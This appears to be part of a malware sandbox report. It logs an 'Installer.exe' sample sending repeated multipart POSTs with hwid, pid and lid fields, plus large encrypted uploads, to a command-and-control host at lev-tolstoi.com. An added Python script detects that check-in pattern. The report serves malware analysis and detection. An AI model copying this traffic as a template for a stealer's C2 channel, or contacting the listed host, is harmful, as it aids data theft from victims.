2024-12-27 22:13:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size line followed by chunk body):
f
ok 8.46.123.189
2024-12-27 22:13:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk):
0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 104.21.66.86 | Destination Port: 443 | PID: 7488 | Process: C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:35 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=V65PP5PG20H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8747
Host: lev-tolstoi.com
2024-12-27 22:13:35 UTC | 8747 | OUT | Data Ascii (multipart body, truncated in the capture):
--V65PP5PG20H
Content-Disposition: form-data; name="hwid"

4EAC7AD5F775DFB71441EDD8E05CE3DA
--V65PP5PG20H
Content-Disposition: form-data; name="pid"

2
--V65PP5PG20H
Content-Disposition: form-data; name="lid"

yau6Na--5223198671
--V65PP5PG20H
2024-12-27 22:13:36 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=b62b4gd1g88nnuq2bpsgg4ll4o; expires=Tue, 22 Apr 2025 16:00:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEqAPknwBAdhvMqXYl%2FEkwqOnpPZ7Z5hHCf1Vphy0xw2DYt8NK5hBIx0aXHCM4I9ehHxwMS2ooI0PWVfqYE%2BB5%2FWC6Iwru8BE13iItMZQ7PzdvCGb%2FzS0TXpb9xFqvKiy9I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca89ffcb7f78d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1485&rtt_var=561&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9678&delivery_rate=1945369&cwnd=104&unsent_bytes=0&cid=0edef60d6ba53bc3&ts=830&x=0"
2024-12-27 22:13:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size line followed by chunk body):
f
ok 8.46.123.189
                                                                                                                                                                                                                                                  2024-12-27 22:13:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:37 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=L860Q9XLZ5OUXDNV6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20436
Host: lev-tolstoi.com
2024-12-27 22:13:37 UTC | 15331 | OUT | Data Raw: 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 38 36 30 51 39 58 4c 5a 35 4f 55 58 44 4e 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36
Data Ascii: --L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="pid"3--L860Q9XLZ5OUXDNV6Content-Disposition: form-data; name="lid"yau6Na--52231986
2024-12-27 22:13:37 UTC | 5105 | OUT | Data Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-27 22:13:38 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3lminkoju1frtj8q10920i1q18; expires=Tue, 22 Apr 2025 16:00:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2DQHFPwa04XmRrsZofzst%2BnBSDVpGS6T1%2FaW81SS4qPC626XZ0U5k36h9vuPVXA%2Fvw5Ncb5%2B9%2BetV7srj4uXpetNAIVBRIwG%2B76ZY1vHAYKF4i4W7JKjdriP62qZdDYkPI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca8aded467c99-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1863&rtt_var=720&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21396&delivery_rate=1567364&cwnd=235&unsent_bytes=0&cid=e3ea1f35ab5e2f2a&ts=959&x=0"
2024-12-27 22:13:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 22:13:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:40 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=I6ZOP83R0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1218
Host: lev-tolstoi.com
2024-12-27 22:13:40 UTC | 1218 | OUT | Data Raw: 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32 32 33 31 39 38 36 37 31 0d 0a 2d 2d 49 36 5a 4f 50 38 33 52 30 4b 0d 0a 43 6f 6e
Data Ascii: --I6ZOP83R0KContent-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--I6ZOP83R0KContent-Disposition: form-data; name="pid"1--I6ZOP83R0KContent-Disposition: form-data; name="lid"yau6Na--5223198671--I6ZOP83R0KCon
2024-12-27 22:13:40 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 22:13:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=89uvsgk959riipckt0hru5minr; expires=Tue, 22 Apr 2025 16:00:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BIuoa4l7ZB0gztrgQqrT%2BpvU9R1NsCDKB5TcAr9OsNGy8jIhEDj7q7OrS9b4OlGOG8jACVKmpyeZ6crloOedU3XPYtCaKt%2Fd%2B%2BYR5yUr%2FFP0utL0nQopHfi6crTSIGVVYw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8ca8bf2b72c44d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1461&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2126&delivery_rate=1441263&cwnd=250&unsent_bytes=0&cid=a9d11f2404fbe9e0&ts=815&x=0"
2024-12-27 22:13:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 22:13:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
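
Every session in this section is the same exchange: a multipart POST to /api on lev-tolstoi.com whose first three parts are hwid, pid and lid (hwid and lid stay constant across sessions; pid is 3 in session 5 and 1 in sessions 6 and 7), followed by further parts the report's hex display cuts off, and a chunked 200 reply whose "Data Ascii" of fok 8.46.123.189 is the chunk size f (15) plus the body ok 8.46.123.189. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses a body reconstructed from the fields visible in session 6 (the closing boundary is constructed, since the capture is truncated before the remaining parts), decodes the reply from the raw bytes shown on the page, and applies a field-name plus acknowledgement check of the kind one would run over proxy captures. The function names and the check are this example's own, not a signature taken from the report.

```python
import re
from typing import Dict, Tuple

# Multipart body reconstructed from the fields visible in session 6 of the report
# (boundary I6ZOP83R0K; hwid, pid, lid). The report's hex display stops before the
# remaining parts, so the closing boundary here is constructed, not captured.
BOUNDARY = "I6ZOP83R0K"
REQUEST_BODY = (
    b'--I6ZOP83R0K\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b"4EAC7AD5F775DFB71441EDD8E05CE3DA\r\n"
    b'--I6ZOP83R0K\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n'
    b'--I6ZOP83R0K\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
    b"yau6Na--5223198671\r\n"
    b"--I6ZOP83R0K--\r\n"
)

# The C2 reply exactly as captured ("Data Raw" of the two IN records after the 200 OK):
# one 0xf-byte chunk, then the zero-length terminating chunk.
RESPONSE_RAW = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a "
    "30 0d 0a 0d 0a"
)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} for a multipart/form-data body (RFC 7578 layout)."""
    delim = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delim)[1:]:        # [0] is the preamble before the first boundary
        if part.startswith(b"--"):            # "--<boundary>--" closes the body
            break
        # Each part is "\r\n<part headers>\r\n\r\n<value>\r\n".
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; sizes are hex, chunk extensions ignored."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:                          # last chunk; trailers (if any) follow
            break
        out += raw[pos:pos + size]
        pos += size + 2                        # skip the CRLF that ends the chunk data
    return bytes(out)


# Field names present in every request on this page, and the reply shape of every response.
CHECKIN_FIELDS = {"hwid", "pid", "lid"}
ACK_RE = re.compile(rb"^ok \d{1,3}(?:\.\d{1,3}){3}$")


def matches_observed_c2_pattern(request_line: str, content_type: str,
                                body: bytes, response_raw: bytes) -> Tuple[bool, dict]:
    """Flag a request/response pair shaped like the /api check-in captured in this report."""
    m = re.search(r"boundary=([^\s;]+)", content_type)
    if not request_line.startswith("POST /api ") or m is None:
        return False, {}
    fields = parse_multipart(body, m.group(1))
    ack = decode_chunked(response_raw)
    hit = CHECKIN_FIELDS.issubset(fields) and ACK_RE.match(ack) is not None
    return hit, {"fields": fields, "ack": ack}


if __name__ == "__main__":
    hit, info = matches_observed_c2_pattern(
        "POST /api HTTP/1.1", "multipart/form-data; boundary=" + BOUNDARY,
        REQUEST_BODY, RESPONSE_RAW)
    print("match:", hit)
    for name, value in info["fields"].items():
        print(f"  {name} = {value!r}")
    print("  ack  =", info["ack"].decode())
```

The boundary is taken from the request's Content-Type header rather than hard-coded because it changes on every session here (L860Q9XLZ5OUXDNV6, I6ZOP83R0K, 8TXD8I0K6I3O97JCMUW); the check keys on field names and the reply shape, not on values, since pid already differs between sessions on this page and hwid is per-victim.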


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 104.21.66.86 | 443 | 7488 | C:\Users\user\Desktop\Installer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 22:13:42 UTC | 283 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=8TXD8I0K6I3O97JCMUW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 570573
Host: lev-tolstoi.com
2024-12-27 22:13:42 UTC | 15331 | OUT | Data Raw: 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 41 43 37 41 44 35 46 37 37 35 44 46 42 37 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 54 58 44 38 49 30 4b 36 49 33 4f 39 37 4a 43 4d 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 32
Data Ascii: --8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="hwid"4EAC7AD5F775DFB71441EDD8E05CE3DA--8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="pid"1--8TXD8I0K6I3O97JCMUWContent-Disposition: form-data; name="lid"yau6Na--52
2024-12-27 22:13:42 UTC | 15331 | OUT | Data Raw: 16 7e 74 8a f5 dd e3 18 65 26 61 e0 49 9c 12 90 f2 e6 bf ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96
Data Ascii: ~te&aI"]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H3
2024-12-27 22:13:42 UTC | 15331 | OUT | Data Raw: 84 df b7 c4 33 99 55 bf 5c 15 f4 4f 0b 15 09 2f 16 46 34 ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93
Data Ascii: 3U\O/F4DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>X
2024-12-27 22:13:42 UTC | 15331 | OUT | Data Raw: 1c 65 3a ef 2a 4f a1 ef c5 1e c3 50 4b af ee 2d 9a a8 3a 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b
                                                                                                                                                                                                                                                  Data Ascii: e:*OPK-:4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 06 4c 0f e3 cd 08 e2 bb 5d 01 a1 65 8d 5b ca 0c e9 87 c4 e9 c5 4c de 84 4d f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2
                                                                                                                                                                                                                                                  Data Ascii: L]e[LM8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#]
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 50 20 c8 0c 39 a5 d8 68 e9 99 1d 29 5b 0a d0 bd 3d bc a6 bd 64 7b 2b b1 42 b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53
                                                                                                                                                                                                                                                  Data Ascii: P 9h)[=d{+BArl[:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDS
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: b0 87 36 b9 eb 75 52 85 c5 72 5f 94 b2 7f ac 99 e0 72 2e 90 21 62 31 1b 89 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08
                                                                                                                                                                                                                                                  Data Ascii: 6uRr_r.!b1<m^YN%z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F
                                                                                                                                                                                                                                                  2024-12-27 22:13:42 UTC15331OUTData Raw: 6d 0a 66 b2 e8 78 91 61 14 c8 ee 4b 78 48 a9 87 95 f8 81 b5 11 b3 ee 0e 92 a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf
                                                                                                                                                                                                                                                  Data Ascii: mfxaKxH'"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc(
